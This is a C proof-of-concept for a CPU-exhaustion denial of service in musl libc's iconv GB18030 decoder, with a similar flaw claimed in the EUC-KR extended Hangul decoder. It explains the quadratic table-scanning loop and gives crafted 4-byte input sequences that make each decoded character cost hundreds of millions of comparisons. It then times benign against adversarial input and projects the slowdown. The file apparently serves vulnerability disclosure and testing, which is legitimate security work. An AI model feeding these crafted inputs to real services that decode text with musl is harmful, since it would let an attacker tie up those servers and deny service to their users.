/* * poc_gb18030_dos.c - PoC: Algorithmic complexity DoS in musl iconv * GB18030 and EUC-KR 4-byte / extended Hangul decoders * * The GB18030 4-byte decoder (iconv.c:434-442) contains a gap-skipping loop * that, for each decoded character, iterates the entire gb18030[126][190] * table (23,940 entries) to count how many 2-byte-mapped codepoints fall * within a sliding range. For inputs whose linear index lands just below * the dense CJK Unified Ideographs block (U+4E00-U+9FBD, ~20,902 entries), * the loop runs ~20,000+ iterations, each scanning all 23,940 entries. * * Result: ~500 million comparisons PER INPUT CHARACTER. * A small crafted input (e.g., 400 bytes = 100 characters) causes * ~50 billion comparisons, taking minutes to hours of CPU time. * * The same pattern exists in the EUC-KR extended Hangul decoder * (iconv.c:514-522) with ksc[93][94] (8,742 entries). * * To test on Alpine Linux (musl-based): * docker run --rm -v $(pwd):/work -w /work alpine:latest \ * sh -c "apk add gcc musl-dev && gcc -O2 -o dos dos.c && ./dos" * * Compile: cc -O2 -o poc_gb18030_dos poc_gb18030_dos.c */ #include #include #include #include #include #include #include static double now(void) { struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts); return ts.tv_sec + ts.tv_nsec * 1e-9; } /* * Time how long it takes to iconv() a buffer of `nchars` copies of * the given 4-byte sequence from GB18030 to UTF-8. * Returns elapsed wall-clock seconds, or -1 on iconv_open failure. */ static double time_gb18030_decode(const uint8_t seq[4], int nchars, const char *label) { iconv_t cd = iconv_open("UTF-8", "GB18030"); if (cd == (iconv_t)-1) { printf(" iconv_open failed: %s\n", strerror(errno)); return -1.0; } size_t inlen = 4 * nchars; size_t outlen = 8 * nchars; /* UTF-8 worst case: 4 bytes per char, generous */ char *inbuf = malloc(inlen); char *outbuf = malloc(outlen); if (!inbuf || !outbuf) { perror("malloc"); exit(1); } /* Fill input with copies of the sequence */ for (int i = 0; i < nchars; i++) memcpy(inbuf + i * 4, seq, 4); char *inp = inbuf; size_t inleft = inlen; char *outp = outbuf; size_t outleft = outlen; printf(" [%s] %d chars (%zu bytes input)... ", label, nchars, inlen); fflush(stdout); double t0 = now(); size_t ret = iconv(cd, &inp, &inleft, &outp, &outleft); double elapsed = now() - t0; size_t consumed = inlen - inleft; size_t produced = outlen - outleft; if (ret == (size_t)-1) { printf("error after %zu/%zu bytes (%.3fs): %s\n", consumed, inlen, elapsed, strerror(errno)); } else { printf("ok, %zu bytes out, %.3fs (%.1f us/char)\n", produced, elapsed, elapsed / nchars * 1e6); } free(inbuf); free(outbuf); iconv_close(cd); return elapsed; } int main(void) { printf("=============================================================\n"); printf("musl iconv GB18030 algorithmic complexity DoS PoC\n"); printf("=============================================================\n\n"); /* * BENIGN input: 81 30 81 30 * Linear index = (0*10+0)*1260 + (0*10+0) + 128 = 128 * This is a low codepoint, the gap-skip loop terminates quickly. */ uint8_t benign[] = { 0x81, 0x30, 0x81, 0x30 }; /* * ADVERSARIAL input: 82 35 8F 33 * Linear index = (1*10+5)*1260 + (14*10+3) + 128 = 19171 * This lands just below the dense CJK block (U+4E00 = 19968). * The gap-skip loop must "chase" through ~20,902 dense entries, * running ~20,905 iterations each scanning 23,940 table entries. */ uint8_t adversarial[] = { 0x82, 0x35, 0x8F, 0x33 }; /* * Another adversarial input right at the CJK boundary */ uint8_t adversarial2[] = { 0x82, 0x35, 0x90, 0x30 }; printf("--- Benign input (fast path) ---\n"); double t_benign_1 = time_gb18030_decode(benign, 1, "benign x1"); double t_benign_10 = time_gb18030_decode(benign, 10, "benign x10"); double t_benign_100 = time_gb18030_decode(benign, 100, "benign x100"); printf("\n--- Adversarial input (triggers dense CJK loop) ---\n"); printf(" WARNING: 1 char may take several seconds!\n"); double t_adv_1 = time_gb18030_decode(adversarial, 1, "adversarial x1"); /* Only continue if the first one wasn't too slow */ double t_adv_5 = -1; if (t_adv_1 < 30.0 && t_adv_1 > 0) { t_adv_5 = time_gb18030_decode(adversarial, 5, "adversarial x5"); } else if (t_adv_1 > 0) { printf(" (skipping larger tests, single char took %.1fs)\n", t_adv_1); } printf("\n--- Adversarial input #2 ---\n"); double t_adv2_1 = time_gb18030_decode(adversarial2, 1, "adversarial2 x1"); printf("\n=============================================================\n"); printf("Results:\n"); printf(" Benign (100 chars): %.6f s\n", t_benign_100); if (t_adv_1 > 0) { printf(" Adversarial (1 char): %.6f s\n", t_adv_1); if (t_benign_1 > 0 && t_benign_1 > 1e-9) { printf(" Slowdown factor: %.0fx per character\n", t_adv_1 / t_benign_1); } if (t_adv_1 > 0.01) { printf(" Projected 100 chars: %.1f seconds\n", t_adv_1 * 100); printf(" Projected 1000 chars: %.1f seconds (%.1f minutes)\n", t_adv_1 * 1000, t_adv_1 * 1000 / 60); printf(" Projected 10000 chars: %.1f minutes\n", t_adv_1 * 10000 / 60); } } printf(" Compare: 40KB of benign GB18030 decodes in microseconds.\n"); printf("=============================================================\n"); return 0; }